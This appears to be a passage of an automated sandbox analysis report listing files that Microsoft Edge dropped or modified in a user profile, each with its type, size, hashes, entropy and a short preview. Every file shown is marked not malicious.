                                                                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Nurturing\campaign_history

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.6773696719930975
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:TLpUAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3islRud6zcQAJmdngzQdoO:TLiOUOq0afDdWec9sJhOs3fsuZ7J5fc
                                                                                                                                                                                                                                                                                                MD5:6FFCCB198DC6B17E165460E6E246B03C
                                                                                                                                                                                                                                                                                                SHA1:014A46B0E6E84089E1C20FA232F54CA737D5F023
                                                                                                                                                                                                                                                                                                SHA-256:D1B2EC8C9906C3418837FFB8E116AA59C026DE2D67B2AFDA956F14D0DC3851AF
                                                                                                                                                                                                                                                                                                SHA-512:846AE3D0A49A14BF82203A0FEDAD6E794F7E68C22A40EE0E014FEA99DFC676FAE4AFEB2C56F324E4361E83A35458C63E2ABAA7B28B6D23B20FA29EF47CBE87B3
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):47
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.3818353308528755
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
                                                                                                                                                                                                                                                                                                MD5:48324111147DECC23AC222A361873FC5
                                                                                                                                                                                                                                                                                                SHA1:0DF8B2267ABBDBD11C422D23338262E3131A4223
                                                                                                                                                                                                                                                                                                SHA-256:D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
                                                                                                                                                                                                                                                                                                SHA-512:E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:customSettings_F95BA787499AB4FA9EFFF472CE383A14

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings_F95BA787499AB4FA9EFFF472CE383A14

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):35
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.014438730983427
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
                                                                                                                                                                                                                                                                                                MD5:BB57A76019EADEDC27F04EB2FB1F1841
                                                                                                                                                                                                                                                                                                SHA1:8B41A1B995D45B7A74A365B6B1F1F21F72F86760
                                                                                                                                                                                                                                                                                                SHA-256:2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
                                                                                                                                                                                                                                                                                                SHA-512:A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"forceServiceDetermination":false}

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):81
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.3439888556902035
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:kDnaV6bVsFUIMf1HDOWg3djTHXoSWDSQ97P:kDYaoUIe1HDM3oskP
                                                                                                                                                                                                                                                                                                MD5:177F4D75F4FEE84EF08C507C3476C0D2
                                                                                                                                                                                                                                                                                                SHA1:08E17AEB4D4066AC034207420F1F73DD8BE3FAA0
                                                                                                                                                                                                                                                                                                SHA-256:21EE7A30C2409E0041CDA6C04EEE72688EB92FE995DC94487FF93AD32BD8F849
                                                                                                                                                                                                                                                                                                SHA-512:94FC142B3CC4844BF2C0A72BCE57363C554356C799F6E581AA3012E48375F02ABD820076A8C2902A3C6BE6AC4D8FA8D4F010D4FF261327E878AF5E5EE31038FB
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):130439
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.80180718117079
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:1536:RlIyFAMrwvaGbyLWzDr6PDofI8vsUnPRLz+PMh:weWGP7Eh
                                                                                                                                                                                                                                                                                                MD5:EB75CEFFE37E6DF9C171EE8380439EDA
                                                                                                                                                                                                                                                                                                SHA1:F00119BA869133D64E4F7F0181161BD47968FA23
                                                                                                                                                                                                                                                                                                SHA-256:48B11410DC937A1723BF4C5AD33ECDB286D8EC69544241BC373F753E64B396C1
                                                                                                                                                                                                                                                                                                SHA-512:044C5113D877CE2E3B42CF07670620937ED7BE2D8B3BF2BAB085C43EF4F64598A7AC56328DDBBE7F0F3CFB9EA49D38CA332BB4ECBFEDBE24AE53B14334A30C8E
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "geoidMaps": {.. "au": "https://australia.smartscreen.microsoft.com/",.. "ch": "https://switzerland.smartscreen.microsoft.com/",.. "eu": "https://europe.smartscreen.microsoft.com/",.. "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "in": "https://india.smartscreen.microsoft.com/",.. "test": "https://eu-9.smartscreen.microsoft.com/",.. "uk": "https://unitedkingdom.smartscreen.microsoft.com/",.. "us": "https://unitedstates.smartscreen.microsoft.com/",.. "gw_au": "https://australia.smartscreen.microsoft.com/",.. "gw_ch": "https://switzerland.smartscreen.microsoft.com/",.. "gw_eu": "https://europe.smartscreen.microsoft.com/",.. "gw_ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "gw_ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "gw_ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "gw_in": "https

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):40
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.346439344671015
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:kfKbUPVXXMVQX:kygV5
                                                                                                                                                                                                                                                                                                MD5:6A3A60A3F78299444AACAA89710A64B6
                                                                                                                                                                                                                                                                                                SHA1:2A052BF5CF54F980475085EEF459D94C3CE5EF55
                                                                                                                                                                                                                                                                                                SHA-256:61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
                                                                                                                                                                                                                                                                                                SHA-512:C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:synchronousLookupUris_638343870221005468

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris_638343870221005468

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):57
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.556488479039065
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:GSCIPPlzYxi21goD:bCWBYx99D
                                                                                                                                                                                                                                                                                                MD5:3A05EAEA94307F8C57BAC69C3DF64E59
                                                                                                                                                                                                                                                                                                SHA1:9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
                                                                                                                                                                                                                                                                                                SHA-256:A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
                                                                                                                                                                                                                                                                                                SHA-512:6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):29
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.030394788231021
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:0xXeZUSXkcVn:0Re5kcV
                                                                                                                                                                                                                                                                                                MD5:52E2839549E67CE774547C9F07740500
                                                                                                                                                                                                                                                                                                SHA1:B172E16D7756483DF0CA0A8D4F7640DD5D557201
                                                                                                                                                                                                                                                                                                SHA-256:F81B7B9CE24F5A2B94182E817037B5F1089DC764BC7E55A9B0A6227A7E121F32
                                                                                                                                                                                                                                                                                                SHA-512:D80E7351E4D83463255C002D3FDCE7E5274177C24C4C728D7B7932D0BE3EBCFEB68E1E65697ED5E162E1B423BB8CDFA0864981C4B466D6AD8B5E724D84B4203B
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:topTraffic_638004170464094982

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_170540185939602997400506234197983529371

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):575056
                                                                                                                                                                                                                                                                                                Entropy (8bit):7.999649474060713
                                                                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                                                                SSDEEP:12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
                                                                                                                                                                                                                                                                                                MD5:BE5D1A12C1644421F877787F8E76642D
                                                                                                                                                                                                                                                                                                SHA1:06C46A95B4BD5E145E015FA7E358A2D1AC52C809
                                                                                                                                                                                                                                                                                                SHA-256:C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
                                                                                                                                                                                                                                                                                                SHA-512:FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:...._+jE.`..}....S..1....G}s..E....y".Wh.^.W.H...-...#.A...KR...9b........>k......bU.IVo...D......Y..[l.yx.......'c=..I0.....E.d...-...1 ....m../C...OQ.........qW..<:N.....38.u..X-..s....<..U.,Mi..._.......`.Y/.........^..,.E..........j@..G8..N.... ..Ea...4.+.79k.!T.-5W..!..@+..!.P..LDG.....V."....L.... .(#..$..&......C.....%A.T}....K_.S..'Q.".d....s....(j.D!......Ov..)*d0)."(..%..-..G..L.}....i.....m9;.....t.w..0....f?..-..M.c.3.....N7K.T..D>.3.x...z..u$5!..4..T.....U.O^L{.5..=E..'..;.}(|.6.:..f!.>...?M.8......P.D.J.I4.<...*.y.E....>....i%.6..Y.@..n.....M..r..C.f.;..<..0.H...F....h.......HB1]1....u..:...H..k....B.Q..J...@}j~.#...'Y.J~....I...ub.&..L[z..1.W/.Ck....M.......[.......N.F..z*.{nZ~d.V.4.u.K.V.......X.<p..cz..>*....X...W..da3(..g..Z$.L4.j=~.p.l.\.[e.&&.Y ...U)..._.^r0.,.{_......`S..[....(.\..p.bt.g..%.$+....f.....d....Im..f...W ......G..i_8a..ae..7....pS.....z-H..A.s.4.3..O.r.....u.S......a.}..v.-/..... ...a.x#./:...sS&U.().xL...pg

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_638004170464094982

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:raw G3 (Group 3) FAX, byte-padded
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):460992
                                                                                                                                                                                                                                                                                                Entropy (8bit):7.999625908035124
                                                                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                                                                SSDEEP:12288:KaRwcD8XXTZGZJHXBjOVX3xFttENr4+3eGPnKvJWXrydqb:KaR5oZ2MBFt8r4+3eG/URdqb
                                                                                                                                                                                                                                                                                                MD5:E9C502DB957CDB977E7F5745B34C32E6
                                                                                                                                                                                                                                                                                                SHA1:DBD72B0D3F46FA35A9FE2527C25271AEC08E3933
                                                                                                                                                                                                                                                                                                SHA-256:5A6B49358772DB0B5C682575F02E8630083568542B984D6D00727740506569D4
                                                                                                                                                                                                                                                                                                SHA-512:B846E682427CF144A440619258F5AA5C94CAEE7612127A60E4BD3C712F8FF614DA232D9A488E27FC2B0D53FD6ACF05409958AEA3B21EA2C1127821BD8E87A5CA
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:...2lI.5.<C.;.{....._+jE.`..}....-...#.A...KR...l.M0,s...).9..........x.......F.b......jU....y.h'....L<...*..Z..*%.*..._...g.4yu...........'c=..I0..........qW..<:N....<..U.,Mi..._......'(..U.9.!........u....7...4. ..Ea...4.+.79k.!T.-5W..!..@+..$..t|1.E..7F...+..xf....z&_Q...-.B...)8R.c....0.......B.M.Z...0....&v..<..H...3.....N7K.T..D>.8......P.D.J.I4.B.H.VHy...@.Wc.Cl..6aD..j.....E..*4..mI..X]2.GH.G.L...E.F.=.J...@}j~.#...'Y.L[z..1.W/.Ck....L..X........J.NYd........>...N.F..z*.{nZ~d.N..../..6.\L...Q...+.w..p...>.S.iG...0]..8....S..)`B#.v..^.*.T.?...Z.rz.D'.!.T.w....S..8....V.4.u.K.V.......W.6s...Y.).[.c.X.S..........5.X7F...tQ....z.L.X..(3#j...8...i.[..j$.Q....0...]"W.c.H..n..2Te.ak...c..-F(..W2.b....3.]......c.d|.../....._...f.....d....Im..g.b..R.q.<x*x...i2..r.I()Iat..b.j.r@K.+5..C.....nJ.>*P,.V@.....s.4.3..O.r.....smd7...L.....].u&1../t.*.......uXb...=@.....wv......]....#.{$.w......i.....|.....?....E7...}$+..t).E.U..Q..~.`.)..Y@.6.h.......%(

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):9
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.169925001442312
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:CMzOn:CM6
                                                                                                                                                                                                                                                                                                MD5:B6F7A6B03164D4BF8E3531A5CF721D30
                                                                                                                                                                                                                                                                                                SHA1:A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
                                                                                                                                                                                                                                                                                                SHA-256:3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
                                                                                                                                                                                                                                                                                                SHA-512:4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:uriCache_

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache_

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):179
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.009455046491566
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:YTyLSmafBoTfIeRDHtDozRLuLgfGBkGAeekVy8HfzXNPIAclT3d:YWLSGTt1o9LuLgfGBPAzkVj/T8lJ
                                                                                                                                                                                                                                                                                                MD5:A65575068F03265C32290E759EC8D129
                                                                                                                                                                                                                                                                                                SHA1:9837D61D7020C53D022257670A41648423363A93
                                                                                                                                                                                                                                                                                                SHA-256:190B15042AFF0622098BC579E60FE848F00F086A2B02242FA005C31F05505183
                                                                                                                                                                                                                                                                                                SHA-512:D113999593E2368BE8910CDB0FC7CE3E374D40C460192930F38F90BD71266B494819E44B6310733B7E57106FB4962A460D551F6A95211747CD6E5720D4C53089
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"version":1,"cache_data":[{"file_hash":"da2d278eafa98c1f","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1736353146620292}]}

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Variations

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):86
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.3751917412896075
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:YQ3JYq9xSs0dMEJAELJ2rjozQp:YQ3Kq9X0dMgAEwjj
                                                                                                                                                                                                                                                                                                MD5:F732DBED9289177D15E236D0F8F2DDD3
                                                                                                                                                                                                                                                                                                SHA1:53F822AF51B014BC3D4B575865D9C3EF0E4DEBDE
                                                                                                                                                                                                                                                                                                SHA-256:2741DF9EE9E9D9883397078F94480E9BC1D9C76996EEC5CFE4E77929337CBE93
                                                                                                                                                                                                                                                                                                SHA-512:B64E5021F32E26C752FCBA15A139815894309B25644E74CECA46A9AA97070BCA3B77DED569A9BFD694193D035BA75B61A8D6262C8E6D5C4D76B452B38F5150A4
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":1}

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\afba5bbe-a611-48a5-9547-bba3d9f767d9.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                                                                Size (bytes):44707
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.095146489362549
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kWuKKGf4yUSqXKVjVqA6N7DRo+yM/42cRaLMoskCioz:z/Ps+wsI7ynUHOtN7VLyMV/YoskFoz
                                                                                                                                                                                                                                                                                                MD5:19B3BE8C0FCB8750AD384ABF59ECDD6B
                                                                                                                                                                                                                                                                                                SHA1:024F98A7741EE7953C6F604C3C48E85264F96AF7
                                                                                                                                                                                                                                                                                                SHA-256:282A713DEB0E4EC3F09217C4CBD6698F0009893F67178F56D1F6A2D1C9D9E453
                                                                                                                                                                                                                                                                                                SHA-512:1D508001D62BA7CEB98675E2E67D0D1C53AC7497147203E473DF878463DAC9E71CDC77D2863CA384650429757FB518FEA93B3167A07864E88A4E7469C1353E9E
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\f371ccbb-ec32-4019-a71b-1e6553176f47.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):44236
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.089522781425741
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kyTKKGf4SQtBF1OIlPsm7DRo+yM/42cRaLMoskCioz:z/Ps+wsI7yn8t5b7VLyMV/YoskFoz
                                                                                                                                                                                                                                                                                                MD5:3038A8D0E05710A868327285F7F0C658
                                                                                                                                                                                                                                                                                                SHA1:68ED80B00ADDBD5F9D4F9C2264580A9C5B4FE6BB
                                                                                                                                                                                                                                                                                                SHA-256:85FB1EBB5B597609ED3A709AC1F3E106A07FF5474F3FD42C887BCD331F79F560
                                                                                                                                                                                                                                                                                                SHA-512:55B71CFCFF528EB434F0642FD2FAE21283CD077B5D11A2C3C8210D4F175763971257209E588311D5CF1A15B5D7955C8A4F64606D988C3E469F328F37D8E3F5AF
                                                                                                                                                                                                                                                                                                Malicious:false
